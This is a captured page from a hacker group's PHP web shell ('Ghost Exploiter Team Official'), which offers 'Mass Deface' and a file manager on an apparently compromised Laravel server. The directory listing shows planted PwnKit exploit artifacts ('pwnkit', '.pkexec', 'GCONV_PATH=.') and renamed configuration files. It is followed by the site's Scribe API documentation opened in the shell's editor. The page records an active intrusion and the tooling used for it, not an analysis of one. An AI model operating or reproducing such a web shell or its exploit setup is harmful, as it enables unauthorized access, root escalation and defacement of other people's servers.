Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.git
--
ren
.pkexec
--
ren
.scribe
--
ren
GCONV_PATH=.
--
ren
app
--
ren
bootstrap
--
ren
config
--
ren
database
--
ren
docker
--
ren
k8s
--
ren
lang
--
ren
mocks
--
ren
public
--
ren
resources
--
ren
routes
--
ren
storage
--
ren
tests
--
ren
vendor
--
ren
01KFX1CYAABDKCK27C2KDZB
...
0KB
edt
ren
AppServiceProvider.php
0KB
edt
ren
BankService.php
0KB
edt
ren
CqrsServiceProvider.php
0KB
edt
ren
PaymentDistribution.php
1.127KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
api.php
1.377KB
edt
ren
app.php
4.229KB
edt
ren
auth-20260128070408.php
0KB
edt
ren
cache-20260128070937.php
0KB
edt
ren
index.blade.php
21.068KB
edt
ren
index.html
0.435KB
edt
ren
index.php
0.457KB
edt
ren
makefile-20260127181230.
0.16KB
edt
ren
phpunit-20260128064127.xml
0KB
edt
ren
pwnkit
10.992KB
edt
ren
services-20260128072548
...
0KB
edt
ren
services.php
1.011KB
edt
ren
web.php
0KB
edt
ren
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <title>Laravel API Documentation</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans&display=swap" rel="stylesheet"> <link rel="stylesheet" href="{{ asset("/vendor/scribe/css/theme-default.style.css") }}" media="screen"> <link rel="stylesheet" href="{{ asset("/vendor/scribe/css/theme-default.print.css") }}" media="print"> <script src="https://cdn.jsdelivr.net/npm/lodash@4.17.10/lodash.min.js"></script> <link rel="stylesheet" href="https://unpkg.com/@highlightjs/cdn-assets@11.6.0/styles/obsidian.min.css"> <script src="https://unpkg.com/@highlightjs/cdn-assets@11.6.0/highlight.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jets/0.14.1/jets.min.js"></script> <style id="language-style"> /* starts out as display none and is replaced with js later */ body .content .bash-example code { display: none; } body .content .javascript-example code { display: none; } </style> <script> var tryItOutBaseUrl = "http://localhost"; var useCsrf = Boolean(); var csrfUrl = "/sanctum/csrf-cookie"; </script> <script src="{{ asset("/vendor/scribe/js/tryitout-5.0.1.js") }}"></script> <script src="{{ asset("/vendor/scribe/js/theme-default-5.0.1.js") }}"></script> </head> <body data-languages="["bash","javascript"]"> <a href="#" id="nav-button"> <span> MENU <img src="{{ asset("/vendor/scribe/images/navbar.png") }}" alt="navbar-image"/> </span> </a> <div class="tocify-wrapper"> <div class="lang-selector"> <button type="button" class="lang-button" data-language-name="bash">bash</button> <button type="button" class="lang-button" data-language-name="javascript">javascript</button> </div> <div class="search"> <input type="text" class="search" id="input-search" placeholder="Search"> </div> <div id="toc"> <ul id="tocify-header-introduction" class="tocify-header"> <li class="tocify-item level-1" data-unique="introduction"> <a href="#introduction">Introduction</a> </li> </ul> <ul id="tocify-header-authenticating-requests" class="tocify-header"> <li class="tocify-item level-1" data-unique="authenticating-requests"> <a href="#authenticating-requests">Authenticating requests</a> </li> </ul> <ul id="tocify-header-endpoints" class="tocify-header"> <li class="tocify-item level-1" data-unique="endpoints"> <a href="#endpoints">Endpoints</a> </li> <ul id="tocify-subheader-endpoints" class="tocify-subheader"> <li class="tocify-item level-2" data-unique="endpoints-GETapi-v1-check-me"> <a href="#endpoints-GETapi-v1-check-me">GET api/v1/check-me</a> </li> </ul> </ul> <ul id="tocify-header-auth" class="tocify-header"> <li class="tocify-item level-1" data-unique="auth"> <a href="#auth">auth</a> </li> <ul id="tocify-subheader-auth" class="tocify-subheader"> <li class="tocify-item level-2" data-unique="auth-POSTapi-v1-login"> <a href="#auth-POSTapi-v1-login">Логин</a> </li> <li class="tocify-item level-2" data-unique="auth-POSTapi-v1-logout"> <a href="#auth-POSTapi-v1-logout">Логаут</a> </li> </ul> </ul> </div> <ul class="toc-footer" id="toc-footer"> <li style="padding-bottom: 5px;"><a href="{{ route("scribe.postman") }}">View Postman collection</a></li> <li style="padding-bottom: 5px;"><a href="{{ route("scribe.openapi") }}">View OpenAPI spec</a></li> <li><a href="http://github.com/knuckleswtf/scribe">Documentation powered by Scribe ✍</a></li> </ul> <ul class="toc-footer" id="last-updated"> <li>Last updated: February 24, 2025</li> </ul> </div> <div class="page-wrapper"> <div class="dark-box"></div> <div class="content"> <h1 id="introduction">Introduction</h1> <aside> <strong>Base URL</strong>: <code>http://localhost</code> </aside> <pre><code>This documentation aims to provide all the information you need to work with our API. <aside>As you scroll, you'll see code examples for working with the API in different programming languages in the dark area to the right (or as part of the content on mobile). You can switch the language used with the tabs at the top right (or from the nav menu at the top left on mobile).</aside></code></pre> <h1 id="authenticating-requests">Authenticating requests</h1> <p>This API is not authenticated.</p> <h1 id="endpoints">Endpoints</h1> <h2 id="endpoints-GETapi-v1-check-me">GET api/v1/check-me</h2> <p> </p> <span id="example-requests-GETapi-v1-check-me"> <blockquote>Example request:</blockquote> <div class="bash-example"> <pre><code class="language-bash">curl --request GET \ --get "http://localhost/api/v1/check-me" \ --header "Content-Type: application/json" \ --header "Accept: application/json"</code></pre></div> <div class="javascript-example"> <pre><code class="language-javascript">const url = new URL( "http://localhost/api/v1/check-me" ); const headers = { "Content-Type": "application/json", "Accept": "application/json", }; fetch(url, { method: "GET", headers, }).then(response => response.json());</code></pre></div> </span> <span id="example-responses-GETapi-v1-check-me"> <blockquote> <p>Example response (401):</p> </blockquote> <details class="annotation"> <summary style="cursor: pointer;"> <small onclick="textContent = parentElement.parentElement.open ? 'Show headers' : 'Hide headers'">Show headers</small> </summary> <pre><code class="language-http">cache-control: no-cache, private content-type: application/json access-control-allow-origin: * </code></pre></details> <pre> <code class="language-json" style="max-height: 300px;">{ "message": "Unauthenticated." }</code> </pre> </span> <span id="execution-results-GETapi-v1-check-me" hidden> <blockquote>Received response<span id="execution-response-status-GETapi-v1-check-me"></span>: </blockquote> <pre class="json"><code id="execution-response-content-GETapi-v1-check-me" data-empty-response-text="<Empty response>" style="max-height: 400px;"></code></pre> </span> <span id="execution-error-GETapi-v1-check-me" hidden> <blockquote>Request failed with error:</blockquote> <pre><code id="execution-error-message-GETapi-v1-check-me"> Tip: Check that you're properly connected to the network. If you're a maintainer of ths API, verify that your API is running and you've enabled CORS. You can check the Dev Tools console for debugging information.</code></pre> </span> <form id="form-GETapi-v1-check-me" data-method="GET" data-path="api/v1/check-me" data-authed="0" data-hasfiles="0" data-isarraybody="0" autocomplete="off" onsubmit="event.preventDefault(); executeTryOut('GETapi-v1-check-me', this);"> <h3> Request <button type="button" style="background-color: #8fbcd4; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-tryout-GETapi-v1-check-me" onclick="tryItOut('GETapi-v1-check-me');">Try it out ⚡ </button> <button type="button" style="background-color: #c97a7e; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-canceltryout-GETapi-v1-check-me" onclick="cancelTryOut('GETapi-v1-check-me');" hidden>Cancel 🛑 </button> <button type="submit" style="background-color: #6ac174; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-executetryout-GETapi-v1-check-me" data-initial-text="Send Request 💥" data-loading-text="⏱ Sending..." hidden>Send Request 💥 </button> </h3> <p> <small class="badge badge-green">GET</small> <b><code>api/v1/check-me</code></b> </p> <h4 class="fancy-heading-panel"><b>Headers</b></h4> <div style="padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>Content-Type</code></b> <input type="text" style="display: none" name="Content-Type" data-endpoint="GETapi-v1-check-me" value="application/json" data-component="header"> <br> <p>Example: <code>application/json</code></p> </div> <div style="padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>Accept</code></b> <input type="text" style="display: none" name="Accept" data-endpoint="GETapi-v1-check-me" value="application/json" data-component="header"> <br> <p>Example: <code>application/json</code></p> </div> </form> <h1 id="auth">auth</h1> <h2 id="auth-POSTapi-v1-login">Логин</h2> <p> </p> <span id="example-requests-POSTapi-v1-login"> <blockquote>Example request:</blockquote> <div class="bash-example"> <pre><code class="language-bash">curl --request POST \ "http://localhost/api/v1/login" \ --header "Content-Type: application/json" \ --header "Accept: application/json" \ --data "{ \"email\": \"gbailey@example.net\", \"password\": \"+-0pBNvYgxwmi\\/#iw\" }" </code></pre></div> <div class="javascript-example"> <pre><code class="language-javascript">const url = new URL( "http://localhost/api/v1/login" ); const headers = { "Content-Type": "application/json", "Accept": "application/json", }; let body = { "email": "gbailey@example.net", "password": "+-0pBNvYgxwmi\/#iw" }; fetch(url, { method: "POST", headers, body: JSON.stringify(body), }).then(response => response.json());</code></pre></div> </span> <span id="example-responses-POSTapi-v1-login"> <blockquote> <p>Example response (200, Ok):</p> </blockquote> <pre> <code class="language-json" style="max-height: 300px;">{ "message": null, "errors": null, "result": null, "status": true }</code> </pre> </span> <span id="execution-results-POSTapi-v1-login" hidden> <blockquote>Received response<span id="execution-response-status-POSTapi-v1-login"></span>: </blockquote> <pre class="json"><code id="execution-response-content-POSTapi-v1-login" data-empty-response-text="<Empty response>" style="max-height: 400px;"></code></pre> </span> <span id="execution-error-POSTapi-v1-login" hidden> <blockquote>Request failed with error:</blockquote> <pre><code id="execution-error-message-POSTapi-v1-login"> Tip: Check that you're properly connected to the network. If you're a maintainer of ths API, verify that your API is running and you've enabled CORS. You can check the Dev Tools console for debugging information.</code></pre> </span> <form id="form-POSTapi-v1-login" data-method="POST" data-path="api/v1/login" data-authed="0" data-hasfiles="0" data-isarraybody="0" autocomplete="off" onsubmit="event.preventDefault(); executeTryOut('POSTapi-v1-login', this);"> <h3> Request <button type="button" style="background-color: #8fbcd4; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-tryout-POSTapi-v1-login" onclick="tryItOut('POSTapi-v1-login');">Try it out ⚡ </button> <button type="button" style="background-color: #c97a7e; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-canceltryout-POSTapi-v1-login" onclick="cancelTryOut('POSTapi-v1-login');" hidden>Cancel 🛑 </button> <button type="submit" style="background-color: #6ac174; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-executetryout-POSTapi-v1-login" data-initial-text="Send Request 💥" data-loading-text="⏱ Sending..." hidden>Send Request 💥 </button> </h3> <p> <small class="badge badge-black">POST</small> <b><code>api/v1/login</code></b> </p> <h4 class="fancy-heading-panel"><b>Headers</b></h4> <div style="padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>Content-Type</code></b> <input type="text" style="display: none" name="Content-Type" data-endpoint="POSTapi-v1-login" value="application/json" data-component="header"> <br> <p>Example: <code>application/json</code></p> </div> <div style="padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>Accept</code></b> <input type="text" style="display: none" name="Accept" data-endpoint="POSTapi-v1-login" value="application/json" data-component="header"> <br> <p>Example: <code>application/json</code></p> </div> <h4 class="fancy-heading-panel"><b>Body Parameters</b></h4> <div style=" padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>email</code></b> <small>string</small> <input type="text" style="display: none" name="email" data-endpoint="POSTapi-v1-login" value="gbailey@example.net" data-component="body"> <br> <p>Must be a valid email address. The <code>email</code> of an existing record in the users table. Must not be greater than 255 characters. Example: <code>gbailey@example.net</code></p> </div> <div style=" padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>password</code></b> <small>string</small> <input type="text" style="display: none" name="password" data-endpoint="POSTapi-v1-login" value="+-0pBNvYgxwmi/#iw" data-component="body"> <br> <p>Must be at least 8 characters. Example: <code>+-0pBNvYgxwmi/#iw</code></p> </div> </form> <h2 id="auth-POSTapi-v1-logout">Логаут</h2> <p> </p> <span id="example-requests-POSTapi-v1-logout"> <blockquote>Example request:</blockquote> <div class="bash-example"> <pre><code class="language-bash">curl --request POST \ "http://localhost/api/v1/logout" \ --header "Content-Type: application/json" \ --header "Accept: application/json"</code></pre></div> <div class="javascript-example"> <pre><code class="language-javascript">const url = new URL( "http://localhost/api/v1/logout" ); const headers = { "Content-Type": "application/json", "Accept": "application/json", }; fetch(url, { method: "POST", headers, }).then(response => response.json());</code></pre></div> </span> <span id="example-responses-POSTapi-v1-logout"> <blockquote> <p>Example response (200, Ok):</p> </blockquote> <pre> <code class="language-json" style="max-height: 300px;">{ "message": null, "errors": null, "result": null, "status": true }</code> </pre> </span> <span id="execution-results-POSTapi-v1-logout" hidden> <blockquote>Received response<span id="execution-response-status-POSTapi-v1-logout"></span>: </blockquote> <pre class="json"><code id="execution-response-content-POSTapi-v1-logout" data-empty-response-text="<Empty response>" style="max-height: 400px;"></code></pre> </span> <span id="execution-error-POSTapi-v1-logout" hidden> <blockquote>Request failed with error:</blockquote> <pre><code id="execution-error-message-POSTapi-v1-logout"> Tip: Check that you're properly connected to the network. If you're a maintainer of ths API, verify that your API is running and you've enabled CORS. You can check the Dev Tools console for debugging information.</code></pre> </span> <form id="form-POSTapi-v1-logout" data-method="POST" data-path="api/v1/logout" data-authed="0" data-hasfiles="0" data-isarraybody="0" autocomplete="off" onsubmit="event.preventDefault(); executeTryOut('POSTapi-v1-logout', this);"> <h3> Request <button type="button" style="background-color: #8fbcd4; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-tryout-POSTapi-v1-logout" onclick="tryItOut('POSTapi-v1-logout');">Try it out ⚡ </button> <button type="button" style="background-color: #c97a7e; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-canceltryout-POSTapi-v1-logout" onclick="cancelTryOut('POSTapi-v1-logout');" hidden>Cancel 🛑 </button> <button type="submit" style="background-color: #6ac174; padding: 5px 10px; border-radius: 5px; border-width: thin;" id="btn-executetryout-POSTapi-v1-logout" data-initial-text="Send Request 💥" data-loading-text="⏱ Sending..." hidden>Send Request 💥 </button> </h3> <p> <small class="badge badge-black">POST</small> <b><code>api/v1/logout</code></b> </p> <h4 class="fancy-heading-panel"><b>Headers</b></h4> <div style="padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>Content-Type</code></b> <input type="text" style="display: none" name="Content-Type" data-endpoint="POSTapi-v1-logout" value="application/json" data-component="header"> <br> <p>Example: <code>application/json</code></p> </div> <div style="padding-left: 28px; clear: unset;"> <b style="line-height: 2;"><code>Accept</code></b> <input type="text" style="display: none" name="Accept" data-endpoint="POSTapi-v1-logout" value="application/json" data-component="header"> <br> <p>Example: <code>application/json</code></p> </div> </form> </div> <div class="dark-box"> <div class="lang-selector"> <button type="button" class="lang-button" data-language-name="bash">bash</button> <button type="button" class="lang-button" data-language-name="javascript">javascript</button> </div> </div> </div> </body> </html>